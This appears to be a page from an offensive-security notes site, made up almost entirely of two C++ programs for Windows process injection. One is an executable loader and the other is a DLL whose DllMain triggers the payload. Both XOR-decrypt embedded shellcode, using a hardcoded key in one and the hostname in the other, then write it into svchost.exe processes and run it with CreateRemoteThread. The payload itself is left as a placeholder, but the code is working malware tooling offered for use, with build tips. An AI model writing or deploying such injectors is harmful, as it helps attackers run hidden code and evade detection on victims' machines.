Process Enumeration and Injection With Parent Process Name Check

#include <windows.h>
#include <string>
#include <iostream>
#include "Winbase.h"
#include <fstream>
#include <tlhelp32.h>
#include <psapi.h>
#include <locale>
#include <codecvt>



using namespace std;


string getppid()
{
	int pid = -1;
	int ppid = -1;
	string ret = "";
	HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	PROCESSENTRY32 pe = { 0 };
	pe.dwSize = sizeof(PROCESSENTRY32);
	LPSTR filename[MAX_PATH];
	HANDLE processHandle = NULL;
	//assume first arg is the PID to get the PPID for, or use own PID
	
		pid = GetCurrentProcessId();
	

	if (Process32First(h, &pe)) {
		do {
			if (pe.th32ProcessID == pid) {
				ppid = pe.th32ParentProcessID;
				printf("PID: %i; PPID: %i\n", pid, pe.th32ParentProcessID);
				//printf("Name: %i\n", pe.szExeFile);
				wcout << pe.szExeFile << "\n";
				break;
				//processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ParentProcessID);
				//GetModuleFileNameEx(processHandle, NULL, filename, MAX_PATH);
				//QueryFullProcessImageNameA(processHandle, NULL, *filename, NULL);
				//GetProcessImageFileNameA(processHandle, *filename, MAX_PATH);
				//CloseHandle(processHandle);
				//cout << filename;
			}

		} while (Process32Next(h, &pe));
		
	}
	if (Process32First(h, &pe)) {
		do {
			if (pe.th32ProcessID == ppid)
			{
				printf("Parent PID: %i; Parent PPID: %i\n", ppid, pe.th32ParentProcessID);
				//printf("Name: %i\n", pe.szExeFile);
				//setup converter
				using convert_type = std::codecvt_utf8<wchar_t>;
				std::wstring_convert<convert_type, wchar_t> converter;

				//use converter (.to_bytes: wstr->str, .from_bytes: str->wstr)
				ret = converter.to_bytes(pe.szExeFile);
				
				//wcout << pe.szExeFile << "\n";
				break;
			}
		} while (Process32Next(h, &pe));
	}
	
	CloseHandle(h);
	return ret;
}




int main(int argc, char* argv[])
{
	
	unsigned char eShellcode[] =
//<Encrypted Shellcode here>











/*
char un[32];
DWORD buf = 32;
GetUserNameA(un, &buf);


char hn[32];
DWORD buf2 = 32;
GetComputerNameA(hn, &buf2);
*/
//std::string key = hn;
//std::string key = un;
std::string key = "whAAaA";
key = key + "424";

//getppid();
string test = getppid();
cout << test << " test" << "\n";
	unsigned char shellcode[sizeof(eShellcode)];
	for (int ii = 0; ii < key.length(); ii++) {
		for (int i = 0; i < sizeof eShellcode; i++) {
			shellcode[i] = eShellcode[i] ^ key[ii];
			eShellcode[i] = shellcode[i];
		}
	}
    
	for (int ii = 0; ii < key.length(); ii++) {
		for (int i = 0; i < sizeof eShellcode;) {
			shellcode[i] = eShellcode[i] ^ key[ii];
			eShellcode[i] = shellcode[i];
			i = i + 2;
		}
	}
	
	unsigned char one[] = "\xfc";
	std::memcpy(shellcode, one, 1);
	//HANDLE processHandle;
	HANDLE remoteThread;
	PVOID remoteBuffer;

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);
	LPCTSTR processName = TEXT("svchost.exe");

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(snapshot, &entry) == TRUE)
	{
		while (Process32Next(snapshot, &entry) == TRUE)
		{
			
			if (!lstrcmpi(entry.szExeFile, processName))
			{
				HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID);
				if (processHandle != NULL) { //check fails to find valid injection, switch to checking createremotethread before breaking
					remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
					WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
					remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);

					CloseHandle(processHandle);
					//break;
				}
			}
		}
	}

	CloseHandle(snapshot);


	/*processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(proc))); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
	remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(processHandle);*/

	return 0;
}
//Updated 6/17/21

// dllmain.cpp : Defines the entry point for the DLL application.
#include <iostream>
#include <string>
#include <Windows.h>
#include <tlhelp32.h>
#include <tchar.h>

/*
Compiled in Visual Studio with a project started as a DLL (Universal Windows)
If errors are thrown mentioning the Linker when trying to compile go to Project >  Properties > Linker > Subsystem. Insure SubSystem is set to Windows(/SUBSYSTEM:WINDOWS)
*/
HANDLE GetProcessByName()
{
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(snapshot, &entry) == TRUE)
	{
		while (Process32Next(snapshot, &entry) == TRUE)
		{
			if (_tcsicmp(entry.szExeFile, _T("svchost.exe")) == 0)
			{
				HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID);

				if (hProcess != NULL)
				{
					return hProcess;
				}

				//CloseHandle(hProcess);
			}
		}
	}

	CloseHandle(snapshot);
	MessageBoxA(NULL, "Error", "GetProcess", 0x0000000L);
	return 0;
}

//testing creating a new thread from DLL Main
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{

	//MessageBoxA(NULL, "hello", "hi", 0x0000000L);
	unsigned char eShellcode[] =
		<encrypted shellcode goes here>


/*
char un[32];
DWORD buf = 32;
GetUserNameA(un, &buf);
*/

char hn[32];
DWORD buf2 = 32;
GetComputerNameExA(ComputerNameDnsHostname,hn, &buf2);
//std::string key = hn;
//std::string key = un;
std::string key = hn;

unsigned char shellcode[sizeof(eShellcode)];
for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode; i++) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
	}
}

for (int ii = 0; ii < key.length(); ii++) {
	for (int i = 0; i < sizeof eShellcode;) {
		shellcode[i] = eShellcode[i] ^ key[ii];
		eShellcode[i] = shellcode[i];
		i = i + 2;
	}
}
//
	HANDLE processHandle;
	HANDLE remoteThread;
	PVOID remoteBuffer;

	//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi("6884"))); //can also use PROCESS_VM_WRITE then PROCESS_CREATE_THREAD
	processHandle = GetProcessByName();
	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
	remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(processHandle);
	


	return 1;
}




//Two is to hijack DLLmail and execute on DLL_PROCESS_ATTACH
BOOL __stdcall DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved)
{

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
		MessageBoxA(NULL, "RunPot", "hi", 0x0000000L);
		CloseHandle(threadHandle);


	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
PreviousExecutionNextDLL Side-Jacking

Last updated

Was this helpful?